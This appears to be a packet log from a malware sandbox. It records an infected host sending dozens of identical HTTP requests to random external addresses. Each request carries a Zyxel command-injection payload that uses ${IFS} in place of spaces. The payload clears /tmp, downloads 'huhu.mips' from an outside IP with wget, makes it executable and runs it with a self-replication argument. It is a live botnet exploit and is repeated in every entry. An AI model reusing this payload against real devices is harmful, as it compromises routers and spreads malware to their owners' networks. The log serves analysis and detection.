                                      Jan 19, 2024 17:29:50.135972977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8759192.168.2.1443944180.28.107.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136064053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8760192.168.2.1438126118.155.61.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136101007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8761192.168.2.1437032105.2.251.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136142969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8762192.168.2.1453818147.170.7.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136178017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8763192.168.2.1444406129.24.25.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136224031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8764192.168.2.1436578164.177.241.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136280060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8765192.168.2.1460688155.45.162.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136306047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8766192.168.2.143330050.33.249.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136339903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8767192.168.2.1447096126.92.209.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136377096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8768192.168.2.1444082149.228.87.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136441946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8769192.168.2.1460608112.54.75.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136454105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8770192.168.2.1441290185.246.191.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136481047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8771192.168.2.145494682.112.92.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136512041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8772192.168.2.145630684.206.142.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136554003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8773192.168.2.1434266205.122.147.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136598110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8774192.168.2.1436548172.223.43.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136632919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8775192.168.2.14425081.24.111.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136667967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8776192.168.2.143721299.101.74.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136724949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8777192.168.2.1441106102.231.122.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136753082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8778192.168.2.1448218122.197.24.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136815071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8779192.168.2.145201014.217.18.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136836052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8780192.168.2.1457672128.227.125.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136897087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8781192.168.2.1441528144.254.25.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136930943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8782192.168.2.145136232.14.147.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136990070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8783192.168.2.14417864.207.49.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.136998892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8784192.168.2.1437950154.156.54.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137037039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8785192.168.2.143731858.232.155.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137053967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8786192.168.2.143647834.239.12.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137094975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8787192.168.2.1434882211.169.215.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137195110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8788192.168.2.1444278107.125.33.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137228012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8789192.168.2.144423879.229.3.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137228966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8790192.168.2.1443598131.28.227.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137259007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8791192.168.2.143490644.110.237.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137286901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8792192.168.2.1455396193.17.196.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137324095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8793192.168.2.1452216205.248.177.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137388945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8794192.168.2.1435864161.57.13.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137423992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8795192.168.2.1434126124.109.10.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137476921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8796192.168.2.1446512197.243.247.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137525082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8797192.168.2.1444076219.135.53.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137550116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8798192.168.2.145391248.22.211.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137600899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8799192.168.2.143695679.249.54.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137619019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8800192.168.2.145653874.157.136.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137672901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8801192.168.2.145129098.149.253.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137715101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8802192.168.2.144381069.43.23.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137763023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8803192.168.2.1458686200.185.70.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137799978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8804192.168.2.1448312177.97.59.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137844086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8805192.168.2.1448090157.59.3.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137862921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8806192.168.2.1448158104.172.79.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137896061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8807192.168.2.1451426172.106.85.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137928009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8808192.168.2.1457918199.245.148.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.137974977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8809192.168.2.145481418.235.59.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138012886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8810192.168.2.1433412178.207.76.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138067007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8811192.168.2.1449742223.202.91.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138124943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8812192.168.2.1460400120.82.243.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138169050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8813192.168.2.1460004129.245.71.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138184071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8814192.168.2.1439742187.94.51.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138226986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8815192.168.2.143461866.129.128.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138259888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8816192.168.2.1435220189.47.33.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138315916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8817192.168.2.1445892145.66.144.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138350010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8818192.168.2.1439014200.4.65.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138376951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8819192.168.2.1457744176.253.139.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138418913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8820192.168.2.1440262113.131.17.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138473034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8821192.168.2.143728819.47.161.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.138505936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8822192.168.2.145724698.62.239.218443
                                      TimestampBytes transferredDirectionData
